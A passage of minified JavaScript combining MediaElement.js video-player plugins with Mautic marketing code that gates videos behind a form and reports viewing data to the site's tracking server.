d=j.height(),f=a.pageY-c.top;if(b=(d-f)/d,0===c.top||0===c.left)return}else{var h=j.width(),i=a.pageX-c.left;b=i/h}b=Math.max(0,b),b=Math.min(b,1),m(b),0===b?e.setMuted(!0):e.setMuted(!1),e.setVolume(b)},o=!1,p=!1;h.hover(function(){i.show(),p=!0},function(){p=!1,o||"vertical"!=g||i.hide()});var q=function(a){var b=Math.floor(100*e.volume);i.attr({"aria-label":mejs.i18n.t("Volume Slider"),"aria-valuemin":0,"aria-valuemax":100,"aria-valuenow":b,"aria-valuetext":b+"%",role:"slider",tabindex:0})};i.bind("mouseover",function(){p=!0}).bind("mousedown",function(a){return n(a),f.globalBind("mousemove.vol",function(a){n(a)}),f.globalBind("mouseup.vol",function(){o=!1,f.globalUnbind(".vol"),p||"vertical"!=g||i.hide()}),o=!0,!1}).bind("keydown",function(a){var b=a.keyCode,c=e.volume;switch(b){case 38:c=Math.min(c+.1,1);break;case 40:c=Math.max(0,c-.1);break;default:return!0}return o=!1,m(c),e.setVolume(c),!1}),h.find("button").click(function(){e.setMuted(!e.muted)}),h.find("button").bind("focus",function(){i.show()}),e.addEventListener("volumechange",function(a){o||(e.muted?(m(0),h.removeClass("mejs-mute").addClass("mejs-unmute")):(m(e.volume),h.removeClass("mejs-unmute").addClass("mejs-mute"))),q(a)},!1),0===b.options.startVolume&&e.setMuted(!0),"native"===e.pluginType&&e.setVolume(b.options.startVolume),f.container.on("controlsresize",function(){m(e.volume)})}}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{usePluginFullScreen:!0,newWindowCallback:function(){return""},fullscreenText:mejs.i18n.t("Fullscreen")}),a.extend(MediaElementPlayer.prototype,{isFullScreen:!1,isNativeFullScreen:!1,isInIframe:!1,fullscreenMode:"",buildfullscreen:function(b,c,d,e){if(b.isVideo){b.isInIframe=window.location!=window.parent.location,e.addEventListener("play",function(){b.detectFullscreenMode()});var f=this,g=null,h=a('<div class="mejs-button mejs-fullscreen-button"><button type="button" aria-controls="'+f.id+'" title="'+f.options.fullscreenText+'" aria-label="'+f.options.fullscreenText+'"></button></div>').appendTo(c).on("click",function(){var a=mejs.MediaFeatures.hasTrueNativeFullScreen&&mejs.MediaFeatures.isFullScreen()||b.isFullScreen;a?b.exitFullScreen():b.enterFullScreen()}).on("mouseover",function(){if("plugin-hover"==f.fullscreenMode){null!==g&&(clearTimeout(g),delete g);var a=h.offset(),c=b.container.offset();e.positionFullscreenButton(a.left-c.left,a.top-c.top,!0)}}).on("mouseout",function(){"plugin-hover"==f.fullscreenMode&&(null!==g&&(clearTimeout(g),delete g),g=setTimeout(function(){e.hideFullscreenButton()},1500))});if(b.fullscreenBtn=h,f.globalBind("keydown",function(a){27==a.keyCode&&(mejs.MediaFeatures.hasTrueNativeFullScreen&&mejs.MediaFeatures.isFullScreen()||f.isFullScreen)&&b.exitFullScreen()}),f.normalHeight=0,f.normalWidth=0,mejs.MediaFeatures.hasTrueNativeFullScreen){var i=function(a){b.isFullScreen&&(mejs.MediaFeatures.isFullScreen()?(b.isNativeFullScreen=!0,b.setControlsSize()):(b.isNativeFullScreen=!1,b.exitFullScreen()))};b.globalBind(mejs.MediaFeatures.fullScreenEventName,i)}}},detectFullscreenMode:function(){var a=this,b="",c=mejs.MediaFeatures;return c.hasTrueNativeFullScreen&&"native"===a.media.pluginType?b="native-native":c.hasTrueNativeFullScreen&&"native"!==a.media.pluginType&&!c.hasFirefoxPluginMovingProblem?b="plugin-native":a.usePluginFullScreen?mejs.MediaFeatures.supportsPointerEvents?(b="plugin-click",a.createPluginClickThrough()):b="plugin-hover":b="fullwindow",a.fullscreenMode=b,b},isPluginClickThroughCreated:!1,createPluginClickThrough:function(){var b=this;if(!b.isPluginClickThroughCreated){var c,d,e=!1,f=function(){if(e){for(var a in g)g[a].hide();b.fullscreenBtn.css("pointer-events",""),b.controls.css("pointer-events",""),b.media.removeEventListener("click",b.clickToPlayPauseCallback),e=!1}},g={},h=["top","left","right","bottom"],i=function(){var a=fullscreenBtn.offset().left-b.container.offset().left,d=fullscreenBtn.offset().top-b.container.offset().top,e=fullscreenBtn.outerWidth(!0),f=fullscreenBtn.outerHeight(!0),h=b.container.width(),i=b.container.height();for(c in g)g[c].css({position:"absolute",top:0,left:0});g.top.width(h).height(d),g.left.width(a).height(f).css({top:d}),g.right.width(h-a-e).height(f).css({top:d,left:a+e}),g.bottom.width(h).height(i-f-d).css({top:d+f})};for(b.globalBind("resize",function(){i()}),c=0,d=h.length;d>c;c++)g[h[c]]=a('<div class="mejs-fullscreen-hover" />').appendTo(b.container).mouseover(f).hide();fullscreenBtn.on("mouseover",function(){if(!b.isFullScreen){var a=fullscreenBtn.offset(),d=player.container.offset();media.positionFullscreenButton(a.left-d.left,a.top-d.top,!1),b.fullscreenBtn.css("pointer-events","none"),b.controls.css("pointer-events","none"),b.media.addEventListener("click",b.clickToPlayPauseCallback);for(c in g)g[c].show();i(),e=!0}}),media.addEventListener("fullscreenchange",function(a){b.isFullScreen=!b.isFullScreen,b.isFullScreen?b.media.removeEventListener("click",b.clickToPlayPauseCallback):b.media.addEventListener("click",b.clickToPlayPauseCallback),f()}),b.globalBind("mousemove",function(a){if(e){var c=fullscreenBtn.offset();(a.pageY<c.top||a.pageY>c.top+fullscreenBtn.outerHeight(!0)||a.pageX<c.left||a.pageX>c.left+fullscreenBtn.outerWidth(!0))&&(fullscreenBtn.css("pointer-events",""),b.controls.css("pointer-events",""),e=!1)}}),b.isPluginClickThroughCreated=!0}},cleanfullscreen:function(a){a.exitFullScreen()},containerSizeTimeout:null,enterFullScreen:function(){var b=this;return mejs.MediaFeatures.hasiOSFullScreen?void b.media.webkitEnterFullscreen():(a(document.documentElement).addClass("mejs-fullscreen"),b.normalHeight=b.container.height(),b.normalWidth=b.container.width(),"native-native"===b.fullscreenMode||"plugin-native"===b.fullscreenMode?(mejs.MediaFeatures.requestFullScreen(b.container[0]),b.isInIframe&&setTimeout(function c(){if(b.isNativeFullScreen){var d=.002,e=a(window).width(),f=screen.width,g=Math.abs(f-e),h=f*d;g>h?b.exitFullScreen():setTimeout(c,500)}},1e3)):"fullwindow"==b.fullscreeMode,b.container.addClass("mejs-container-fullscreen").width("100%").height("100%"),b.containerSizeTimeout=setTimeout(function(){b.container.css({width:"100%",height:"100%"}),b.setControlsSize()},500),"native"===b.media.pluginType?b.$media.width("100%").height("100%"):(b.container.find(".mejs-shim").width("100%").height("100%"),setTimeout(function(){var c=a(window),d=c.width(),e=c.height();b.media.setVideoSize(d,e)},500)),b.layers.children("div").width("100%").height("100%"),b.fullscreenBtn&&b.fullscreenBtn.removeClass("mejs-fullscreen").addClass("mejs-unfullscreen"),b.setControlsSize(),b.isFullScreen=!0,b.container.find(".mejs-captions-text").css("font-size",screen.width/b.width*1*100+"%"),b.container.find(".mejs-captions-position").css("bottom","45px"),void b.container.trigger("enteredfullscreen"))},exitFullScreen:function(){var b=this;clearTimeout(b.containerSizeTimeout),mejs.MediaFeatures.hasTrueNativeFullScreen&&(mejs.MediaFeatures.isFullScreen()||b.isFullScreen)&&mejs.MediaFeatures.cancelFullScreen(),a(document.documentElement).removeClass("mejs-fullscreen"),b.container.removeClass("mejs-container-fullscreen").width(b.normalWidth).height(b.normalHeight),"native"===b.media.pluginType?b.$media.width(b.normalWidth).height(b.normalHeight):(b.container.find(".mejs-shim").width(b.normalWidth).height(b.normalHeight),b.media.setVideoSize(b.normalWidth,b.normalHeight)),b.layers.children("div").width(b.normalWidth).height(b.normalHeight),b.fullscreenBtn.removeClass("mejs-unfullscreen").addClass("mejs-fullscreen"),b.setControlsSize(),b.isFullScreen=!1,b.container.find(".mejs-captions-text").css("font-size",""),b.container.find(".mejs-captions-position").css("bottom",""),b.container.trigger("exitedfullscreen")}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{speeds:["2.00","1.50","1.25","1.00","0.75"],defaultSpeed:"1.00",speedChar:"x"}),a.extend(MediaElementPlayer.prototype,{buildspeed:function(b,c,d,e){var f=this;if("native"==f.media.pluginType){for(var g=null,h=null,i=null,j=null,k=[],l=!1,m=0,n=f.options.speeds.length;n>m;m++){var o=f.options.speeds[m];"string"==typeof o?(k.push({name:o+f.options.speedChar,value:o}),o===f.options.defaultSpeed&&(l=!0)):(k.push(o),o.value===f.options.defaultSpeed&&(l=!0))}l||k.push({name:f.options.defaultSpeed+f.options.speedChar,value:f.options.defaultSpeed}),k.sort(function(a,b){return parseFloat(b.value)-parseFloat(a.value)});var p=function(a){for(m=0,n=k.length;n>m;m++)if(k[m].value===a)return k[m].name},q='<div class="mejs-button mejs-speed-button"><button type="button">'+p(f.options.defaultSpeed)+'</button><div class="mejs-speed-selector"><ul>';for(m=0,il=k.length;m<il;m++)j=f.id+"-speed-"+k[m].value,q+='<li><input type="radio" name="speed" value="'+k[m].value+'" id="'+j+'" '+(k[m].value===f.options.defaultSpeed?" checked":"")+' /><label for="'+j+'" '+(k[m].value===f.options.defaultSpeed?' class="mejs-speed-selected"':"")+">"+k[m].name+"</label></li>";q+="</ul></div></div>",g=a(q).appendTo(c),h=g.find(".mejs-speed-selector"),i=f.options.defaultSpeed,e.addEventListener("loadedmetadata",function(a){i&&(e.playbackRate=parseFloat(i))},!0),h.on("click",'input[type="radio"]',function(){var b=a(this).attr("value");i=b,e.playbackRate=parseFloat(b),g.find("button").html(p(b)),g.find(".mejs-speed-selected").removeClass("mejs-speed-selected"),g.find('input[type="radio"]:checked').next().addClass("mejs-speed-selected")}),g.one("mouseenter focusin",function(){h.height(g.find(".mejs-speed-selector ul").outerHeight(!0)+g.find(".mejs-speed-translations").outerHeight(!0)).css("top",-1*h.height()+"px")})}}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{startLanguage:"",tracksText:mejs.i18n.t("Captions/Subtitles"),tracksAriaLive:!1,hideCaptionsButtonWhenEmpty:!0,toggleCaptionsButtonWhenOnlyOne:!1,slidesSelector:""}),a.extend(MediaElementPlayer.prototype,{hasChapters:!1,cleartracks:function(a,b,c,d){a&&(a.captions&&a.captions.remove(),a.chapters&&a.chapters.remove(),a.captionsText&&a.captionsText.remove(),a.captionsButton&&a.captionsButton.remove())},buildtracks:function(b,c,d,e){if(0!==b.tracks.length){var f,g=this,h=g.options.tracksAriaLive?'role="log" aria-live="assertive" aria-atomic="false"':"";if(g.domNode.textTracks)for(f=g.domNode.textTracks.length-1;f>=0;f--)g.domNode.textTracks[f].mode="hidden";g.cleartracks(b,c,d,e),b.chapters=a('<div class="mejs-chapters mejs-layer"></div>').prependTo(d).hide(),b.captions=a('<div class="mejs-captions-layer mejs-layer"><div class="mejs-captions-position mejs-captions-position-hover" '+h+'><span class="mejs-captions-text"></span></div></div>').prependTo(d).hide(),b.captionsText=b.captions.find(".mejs-captions-text"),b.captionsButton=a('<div class="mejs-button mejs-captions-button"><button type="button" aria-controls="'+g.id+'" title="'+g.options.tracksText+'" aria-label="'+g.options.tracksText+'"></button><div class="mejs-captions-selector"><ul><li><input type="radio" name="'+b.id+'_captions" id="'+b.id+'_captions_none" value="none" checked="checked" /><label for="'+b.id+'_captions_none">'+mejs.i18n.t("None")+"</label></li></ul></div></div>").appendTo(c);var i=0;for(f=0;f<b.tracks.length;f++)"subtitles"==b.tracks[f].kind&&i++;for(g.options.toggleCaptionsButtonWhenOnlyOne&&1==i?b.captionsButton.on("click",function(){null===b.selectedTrack?lang=b.tracks[0].srclang:lang="none",b.setTrack(lang)}):(b.captionsButton.on("mouseenter focusin",function(){a(this).find(".mejs-captions-selector").removeClass("mejs-offscreen")}).on("click","input[type=radio]",function(){lang=this.value,b.setTrack(lang)}),b.captionsButton.on("mouseleave focusout",function(){a(this).find(".mejs-captions-selector").addClass("mejs-offscreen")})),b.options.alwaysShowControls?b.container.find(".mejs-captions-position").addClass("mejs-captions-position-hover"):b.container.bind("controlsshown",function(){b.container.find(".mejs-captions-position").addClass("mejs-captions-position-hover")}).bind("controlshidden",function(){e.paused||b.container.find(".mejs-captions-position").removeClass("mejs-captions-position-hover")}),b.trackToLoad=-1,b.selectedTrack=null,b.isLoadingTrack=!1,f=0;f<b.tracks.length;f++)"subtitles"==b.tracks[f].kind&&b.addTrackButton(b.tracks[f].srclang,b.tracks[f].label);b.loadNextTrack(),e.addEventListener("timeupdate",function(a){b.displayCaptions()},!1),""!==b.options.slidesSelector&&(b.slidesContainer=a(b.options.slidesSelector),e.addEventListener("timeupdate",function(a){b.displaySlides()},!1)),e.addEventListener("loadedmetadata",function(a){b.displayChapters()},!1),b.container.hover(function(){b.hasChapters&&(b.chapters.removeClass("mejs-offscreen"),b.chapters.fadeIn(200).height(b.chapters.find(".mejs-chapter").outerHeight()))},function(){b.hasChapters&&!e.paused&&b.chapters.fadeOut(200,function(){a(this).addClass("mejs-offscreen"),a(this).css("display","block")})}),g.container.on("controlsresize",function(){g.adjustLanguageBox()}),null!==b.node.getAttribute("autoplay")&&b.chapters.addClass("mejs-offscreen")}},setTrack:function(a){var b,c=this;if("none"==a)c.selectedTrack=null,c.captionsButton.removeClass("mejs-captions-enabled");else for(b=0;b<c.tracks.length;b++)if(c.tracks[b].srclang==a){null===c.selectedTrack&&c.captionsButton.addClass("mejs-captions-enabled"),c.selectedTrack=c.tracks[b],c.captions.attr("lang",c.selectedTrack.srclang),c.displayCaptions();break}},loadNextTrack:function(){var a=this;a.trackToLoad++,a.trackToLoad<a.tracks.length?(a.isLoadingTrack=!0,a.loadTrack(a.trackToLoad)):(a.isLoadingTrack=!1,a.checkForTracks())},loadTrack:function(b){var c=this,d=c.tracks[b],e=function(){d.isLoaded=!0,c.enableTrackButton(d.srclang,d.label),c.loadNextTrack()};a.ajax({url:d.src,dataType:"text",success:function(a){"string"==typeof a&&/<tt\s+xml/gi.exec(a)?d.entries=mejs.TrackFormatParser.dfxp.parse(a):d.entries=mejs.TrackFormatParser.webvtt.parse(a),e(),"chapters"==d.kind&&c.media.addEventListener("play",function(a){c.media.duration>0&&c.displayChapters(d)},!1),"slides"==d.kind&&c.setupSlides(d)},error:function(){c.removeTrackButton(d.srclang),c.loadNextTrack()}})},enableTrackButton:function(b,c){var d=this;""===c&&(c=mejs.language.codes[b]||b),d.captionsButton.find("input[value="+b+"]").prop("disabled",!1).siblings("label").html(c),d.options.startLanguage==b&&a("#"+d.id+"_captions_"+b).prop("checked",!0).trigger("click"),d.adjustLanguageBox()},removeTrackButton:function(a){var b=this;b.captionsButton.find("input[value="+a+"]").closest("li").remove(),b.adjustLanguageBox()},addTrackButton:function(b,c){var d=this;""===c&&(c=mejs.language.codes[b]||b),d.captionsButton.find("ul").append(a('<li><input type="radio" name="'+d.id+'_captions" id="'+d.id+"_captions_"+b+'" value="'+b+'" disabled="disabled" /><label for="'+d.id+"_captions_"+b+'">'+c+" (loading)</label></li>")),d.adjustLanguageBox(),d.container.find(".mejs-captions-translations option[value="+b+"]").remove()},adjustLanguageBox:function(){var a=this;a.captionsButton.find(".mejs-captions-selector").height(a.captionsButton.find(".mejs-captions-selector ul").outerHeight(!0)+a.captionsButton.find(".mejs-captions-translations").outerHeight(!0))},checkForTracks:function(){var a=this,b=!1;if(a.options.hideCaptionsButtonWhenEmpty){for(i=0;i<a.tracks.length;i++)if("subtitles"==a.tracks[i].kind&&a.tracks[i].isLoaded){b=!0;break}b||(a.captionsButton.hide(),a.setControlsSize())}},displayCaptions:function(){if("undefined"!=typeof this.tracks){var a,b=this,c=b.selectedTrack;if(null!==c&&c.isLoaded){for(a=0;a<c.entries.times.length;a++)if(b.media.currentTime>=c.entries.times[a].start&&b.media.currentTime<=c.entries.times[a].stop)return b.captionsText.html(c.entries.text[a]).attr("class","mejs-captions-text "+(c.entries.times[a].identifier||"")),void b.captions.show().height(0);b.captions.hide()}else b.captions.hide()}},setupSlides:function(a){var b=this;b.slides=a,b.slides.entries.imgs=[b.slides.entries.text.length],b.showSlide(0)},showSlide:function(b){if("undefined"!=typeof this.tracks&&"undefined"!=typeof this.slidesContainer){var c=this,d=c.slides.entries.text[b],e=c.slides.entries.imgs[b];"undefined"==typeof e||"undefined"==typeof e.fadeIn?c.slides.entries.imgs[b]=e=a('<img src="'+d+'">').on("load",function(){e.appendTo(c.slidesContainer).hide().fadeIn().siblings(":visible").fadeOut()}):e.is(":visible")||e.is(":animated")||e.fadeIn().siblings(":visible").fadeOut()}},displaySlides:function(){if("undefined"!=typeof this.slides){var a,b=this,c=b.slides;for(a=0;a<c.entries.times.length;a++)if(b.media.currentTime>=c.entries.times[a].start&&b.media.currentTime<=c.entries.times[a].stop)return void b.showSlide(a)}},displayChapters:function(){var a,b=this;for(a=0;a<b.tracks.length;a++)if("chapters"==b.tracks[a].kind&&b.tracks[a].isLoaded){b.drawChapters(b.tracks[a]),b.hasChapters=!0;break}},drawChapters:function(b){var c,d,e=this,f=0,g=0;for(e.chapters.empty(),c=0;c<b.entries.times.length;c++)d=b.entries.times[c].stop-b.entries.times[c].start,f=Math.floor(d/e.media.duration*100),(f+g>100||c==b.entries.times.length-1&&100>f+g)&&(f=100-g),e.chapters.append(a('<div class="mejs-chapter" rel="'+b.entries.times[c].start+'" style="left: '+g.toString()+"%;width: "+f.toString()+'%;"><div class="mejs-chapter-block'+(c==b.entries.times.length-1?" mejs-chapter-block-last":"")+'"><span class="ch-title">'+b.entries.text[c]+'</span><span class="ch-time">'+mejs.Utility.secondsToTimeCode(b.entries.times[c].start,e.options)+"&ndash;"+mejs.Utility.secondsToTimeCode(b.entries.times[c].stop,e.options)+"</span></div></div>")),g+=f;e.chapters.find("div.mejs-chapter").click(function(){e.media.setCurrentTime(parseFloat(a(this).attr("rel"))),e.media.paused&&e.media.play()}),e.chapters.show()}}),mejs.language={codes:{af:"Afrikaans",sq:"Albanian",ar:"Arabic",be:"Belarusian",bg:"Bulgarian",ca:"Catalan",zh:"Chinese","zh-cn":"Chinese Simplified","zh-tw":"Chinese Traditional",hr:"Croatian",cs:"Czech",da:"Danish",nl:"Dutch",en:"English",et:"Estonian",fl:"Filipino",fi:"Finnish",fr:"French",gl:"Galician",de:"German",el:"Greek",ht:"Haitian Creole",iw:"Hebrew",hi:"Hindi",hu:"Hungarian",is:"Icelandic",id:"Indonesian",ga:"Irish",it:"Italian",ja:"Japanese",ko:"Korean",lv:"Latvian",lt:"Lithuanian",mk:"Macedonian",ms:"Malay",mt:"Maltese",no:"Norwegian",fa:"Persian",pl:"Polish",pt:"Portuguese",ro:"Romanian",ru:"Russian",sr:"Serbian",sk:"Slovak",sl:"Slovenian",es:"Spanish",sw:"Swahili",sv:"Swedish",tl:"Tagalog",th:"Thai",tr:"Turkish",uk:"Ukrainian",vi:"Vietnamese",cy:"Welsh",yi:"Yiddish"}},mejs.TrackFormatParser={webvtt:{pattern_timecode:/^((?:[0-9]{1,2}:)?[0-9]{2}:[0-9]{2}([,.][0-9]{1,3})?) --\> ((?:[0-9]{1,2}:)?[0-9]{2}:[0-9]{2}([,.][0-9]{3})?)(.*)$/,parse:function(b){for(var c,d,e,f=0,g=mejs.TrackFormatParser.split2(b,/\r?\n/),h={text:[],times:[]};f<g.length;f++){if(c=this.pattern_timecode.exec(g[f]),c&&f<g.length){for(f-1>=0&&""!==g[f-1]&&(e=g[f-1]),f++,d=g[f],f++;""!==g[f]&&f<g.length;)d=d+"\n"+g[f],f++;d=a.trim(d).replace(/(\b(https?|ftp|file):\/\/[-A-Z0-9+&@#\/%?=~_|!:,.;]*[-A-Z0-9+&@#\/%=~_|])/gi,"<a href='$1' target='_blank'>$1</a>"),h.text.push(d),h.times.push({identifier:e,start:0===mejs.Utility.convertSMPTEtoSeconds(c[1])?.2:mejs.Utility.convertSMPTEtoSeconds(c[1]),stop:mejs.Utility.convertSMPTEtoSeconds(c[3]),settings:c[5]})}e=""}return h}},dfxp:{parse:function(b){b=a(b).filter("tt");var c,d,e=0,f=b.children("div").eq(0),g=f.find("p"),h=b.find("#"+f.attr("style")),i={text:[],times:[]};if(h.length){var j=h.removeAttr("id").get(0).attributes;if(j.length)for(c={},e=0;e<j.length;e++)c[j[e].name.split(":")[1]]=j[e].value}for(e=0;e<g.length;e++){var k,l={start:null,stop:null,style:null};if(g.eq(e).attr("begin")&&(l.start=mejs.Utility.convertSMPTEtoSeconds(g.eq(e).attr("begin"))),!l.start&&g.eq(e-1).attr("end")&&(l.start=mejs.Utility.convertSMPTEtoSeconds(g.eq(e-1).attr("end"))),g.eq(e).attr("end")&&(l.stop=mejs.Utility.convertSMPTEtoSeconds(g.eq(e).attr("end"))),!l.stop&&g.eq(e+1).attr("begin")&&(l.stop=mejs.Utility.convertSMPTEtoSeconds(g.eq(e+1).attr("begin"))),c){k="";for(var m in c)k+=m+":"+c[m]+";"}k&&(l.style=k),0===l.start&&(l.start=.2),i.times.push(l),d=a.trim(g.eq(e).html()).replace(/(\b(https?|ftp|file):\/\/[-A-Z0-9+&@#\/%?=~_|!:,.;]*[-A-Z0-9+&@#\/%=~_|])/gi,"<a href='$1' target='_blank'>$1</a>"),i.text.push(d),0===i.times.start&&(i.times.start=2)}return i}},split2:function(a,b){return a.split(b)}},3!="x\n\ny".split(/\n/gi).length&&(mejs.TrackFormatParser.split2=function(a,b){var c,d=[],e="";for(c=0;c<a.length;c++)e+=a.substring(c,c+1),b.test(e)&&(d.push(e.replace(b,"")),e="");return d.push(e),d})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{contextMenuItems:[{render:function(a){return"undefined"==typeof a.enterFullScreen?null:a.isFullScreen?mejs.i18n.t("Turn off Fullscreen"):mejs.i18n.t("Go Fullscreen")},click:function(a){a.isFullScreen?a.exitFullScreen():a.enterFullScreen()}},{render:function(a){return a.media.muted?mejs.i18n.t("Unmute"):mejs.i18n.t("Mute")},click:function(a){a.media.muted?a.setMuted(!1):a.setMuted(!0)}},{isSeparator:!0},{render:function(a){return mejs.i18n.t("Download Video")},click:function(a){window.location.href=a.media.currentSrc}}]}),a.extend(MediaElementPlayer.prototype,{buildcontextmenu:function(b,c,d,e){b.contextMenu=a('<div class="mejs-contextmenu"></div>').appendTo(a("body")).hide(),b.container.bind("contextmenu",function(a){return b.isContextMenuEnabled?(a.preventDefault(),b.renderContextMenu(a.clientX-1,a.clientY-1),!1):void 0}),b.container.bind("click",function(){b.contextMenu.hide()}),b.contextMenu.bind("mouseleave",function(){b.startContextMenuTimer()})},cleancontextmenu:function(a){a.contextMenu.remove()},isContextMenuEnabled:!0,enableContextMenu:function(){this.isContextMenuEnabled=!0},disableContextMenu:function(){this.isContextMenuEnabled=!1},contextMenuTimeout:null,startContextMenuTimer:function(){var a=this;a.killContextMenuTimer(),a.contextMenuTimer=setTimeout(function(){a.hideContextMenu(),a.killContextMenuTimer()},750)},killContextMenuTimer:function(){var a=this.contextMenuTimer;null!=a&&(clearTimeout(a),delete a,a=null)},hideContextMenu:function(){this.contextMenu.hide()},renderContextMenu:function(b,c){for(var d=this,e="",f=d.options.contextMenuItems,g=0,h=f.length;h>g;g++)if(f[g].isSeparator)e+='<div class="mejs-contextmenu-separator"></div>';else{var i=f[g].render(d);null!=i&&(e+='<div class="mejs-contextmenu-item" data-itemindex="'+g+'" id="element-'+1e6*Math.random()+'">'+i+"</div>")}d.contextMenu.empty().append(a(e)).css({top:c,left:b}).show(),d.contextMenu.find(".mejs-contextmenu-item").each(function(){var b=a(this),c=parseInt(b.data("itemindex"),10),e=d.options.contextMenuItems[c];"undefined"!=typeof e.show&&e.show(b,d),b.click(function(){"undefined"!=typeof e.click&&e.click(d),d.contextMenu.hide()})}),setTimeout(function(){d.killControlsTimer("rev3")},100)}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{skipBackInterval:30,skipBackText:mejs.i18n.t("Skip back %1 seconds")}),a.extend(MediaElementPlayer.prototype,{buildskipback:function(b,c,d,e){var f=this,g=f.options.skipBackText.replace("%1",f.options.skipBackInterval);a('<div class="mejs-button mejs-skip-back-button"><button type="button" aria-controls="'+f.id+'" title="'+g+'" aria-label="'+g+'">'+f.options.skipBackInterval+"</button></div>").appendTo(c).click(function(){e.setCurrentTime(Math.max(e.currentTime-f.options.skipBackInterval,0)),a(this).find("button").blur()})}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{postrollCloseText:mejs.i18n.t("Close")}),a.extend(MediaElementPlayer.prototype,{buildpostroll:function(b,c,d,e){var f=this,g=f.container.find('link[rel="postroll"]').attr("href");"undefined"!=typeof g&&(b.postroll=a('<div class="mejs-postroll-layer mejs-layer"><a class="mejs-postroll-close" onclick="$(this).parent().hide();return false;">'+f.options.postrollCloseText+'</a><div class="mejs-postroll-layer-content"></div></div>').prependTo(d).hide(),f.media.addEventListener("ended",function(c){a.ajax({dataType:"html",url:g,success:function(a,b){d.find(".mejs-postroll-layer-content").html(a)}}),b.postroll.show()},!1))}})}(mejs.$);MauticJS.processGatedVideos(MauticJS.videoElements);}};MauticJS.processGatedVideos=function(videoElements){window.mediaPlayers=[];window.setInterval(function(e){MauticJS.iterateCollection(mediaPlayers)(function(node,i){if(mediaPlayers[i].views){MauticJS.iterateCollection(mediaPlayers[i].views)(function(nodeA,iA){if(!node.views[iA].sent){MauticJS.makeCORSRequest('POST','https://ariticpinpoint.myfitfuel.in/ma/video/hit',node.views[iA],function(data){if(data.success&&node.views[iA].locked){node.views[iA].sent=true;}});}});}});},3000);MauticJS.addVideoView=function(i,totalWatched){if(totalWatched==0){return;} var viewId=mediaPlayers[i].views.length;var view={guid:MauticJS.guid(),locked:false,duration:mediaPlayers[i].mediaElement.duration,url:mediaPlayers[i].mediaElement.src};MauticJS.iterateCollection(mediaPlayers[i].views)(function(node,j){if(mediaPlayers[i].views[j].locked==false){viewId=j;view=mediaPlayers[i].views[j];}});view.total_watched=totalWatched;mediaPlayers[i].views[viewId]=view;};MauticJS.endCurrentView=function(i){var viewId=0;MauticJS.iterateCollection(mediaPlayers[i].views)(function(node,j){if(mediaPlayers[i].views[j].locked==false){viewId=j;}});mediaPlayers[i].views[viewId].locked=true;};MauticJS.iterateCollection(videoElements)(function(node,i){var playerFeatures=[];var source=node.getElementsByTagName('source')[0];if(source.type==='video/mp4'){node.dataset.mp4=true;playerFeatures=['playpause','progress','current','duration','volume','fullscreen'];} playerFeatures=['playpause','progress','current','duration','volume','fullscreen'];if(!node.id){node.id='mautic-player-'+i;} mediaPlayers[i]=[];if(node.dataset.formId){var cookieName='mautic-player-'+i+'-'+node.dataset.formId;MauticJS.makeCORSRequest('GET','https://ariticpinpoint.myfitfuel.in/ma/form/embed/'+node.dataset.formId,{},function(data){mediaPlayers[i].formHtml=data;});}else{mediaPlayers[i].formHtml='';} if(!node.dataset.formId&&!node.dataset.mauticVideo){return;} mediaPlayers[i].player=new MediaElementPlayer('#'+node.id,{features:playerFeatures,alwaysShowControls:true,enableKeyboard:false,success:function(mediaElement,domElement){mediaPlayers[i].inPoster=false;mediaPlayers[i].success=false;mediaPlayers[i].views=[];mediaPlayers[i].mediaElement=mediaElement;if(!node.dataset.mp4){node.parentElement.parentElement.parentElement.className+=' no-controls';} var iframes=node.parentElement.getElementsByTagName('iframe');if(iframes){MauticJS.iterateCollection(iframes)(function(node,i){node.setAttribute('tabindex',-1);});} mediaElement.addEventListener('ended',function(e){MauticJS.endCurrentView(i);});mediaElement.addEventListener('timeupdate',function(e){var currentTime=0;if('Event'==e.constructor.name){currentTime=e.srcElement.currentTime;}else{currentTime=e.currentTime;} MauticJS.addVideoView(i,currentTime);if(node.dataset.formId&&document.cookie.indexOf(cookieName)==-1&&currentTime>=node.dataset.gateTime&&mediaPlayers[i].inPoster===false&&mediaPlayers[i].success===false){if(document.activeElement.tagName=='IFRAME'){window.mejs.previousActiveElement=document.activeElement;document.activeElement.blur();} mediaPlayers[i].inPoster=true;mediaPlayers[i].player.pause();mediaPlayers[i].poster=document.getElementById(node.id).parentElement.parentElement.getElementsByClassName('mejs-poster')[0];mediaPlayers[i].poster.innerHTML=mediaPlayers[i].formHtml;mediaPlayers[i].poster.style.display='block';mediaPlayers[i].form=mediaPlayers[i].poster.getElementsByTagName('form')[0];mediaPlayers[i].form.className+=' mautic-gated-video-style';mediaPlayers[i].form.addEventListener('submit',function(e){e.preventDefault();MauticJS.makeCORSRequest('POST','https://ariticpinpoint.myfitfuel.in/ma/form/submit/ajax?formId='+node.dataset.formId,jQuery(mediaPlayers[i].form).serialize(),function(data){if(data.success){mediaPlayers[i].success=true;if(!data.message){mediaPlayers[i].poster.style.display='none';mediaPlayers[i].player.play();window.mejs.previousActiveElement.focus();} document.cookie=cookieName+"=true; max-age="+60*60*24*7;} if(data.message){var position=parseInt(mediaPlayers[i].poster.style.height)/1.4;mediaPlayers[i].poster.innerHTML='<p style="padding:20px;padding-top:'+position+'px;" class="mautic-response">'+data.message+'</p>';setTimeout(function(){mediaPlayers[i].poster.style.display='none';mediaPlayers[i].player.play();if(window.mejs.previousActiveElement&&window.mejs.previousActiveElement.tagName=='IFRAME'){window.mejs.previousActiveElement.focus();}},3000);}else if(data.validationErrors){jQuery('#mauticform_'+data.formName+' .mauticform-errormsg').css('display','none');jQuery.each(data.validationErrors,function(field,message){if(jQuery('#mauticform_'+data.formName+'_'+field+' .mauticform-errormsg')){jQuery('#mauticform_'+data.formName+'_'+field+' .mauticform-errormsg').css('display','block');}});}});return false;});}});}});if(node.autoplay){mediaPlayers[i].player.play();}});} MauticJS.documentReady(MauticJS.initGatedVideo);MauticJS.mtcEventSet=false;document.addEventListener('mauticPageEventDelivered',function(e){var detail=e.detail;if(!MauticJS.mtcEventSet&&detail.response&&detail.response.events){MauticJS.setTrackedEvents(detail.response.events);}});MauticJS.setTrackedEvents=function(events){MauticJS.mtcEventSet=true;if(typeof fbq!=='undefined'&&typeof events.facebook_pixel!=='undefined'){var 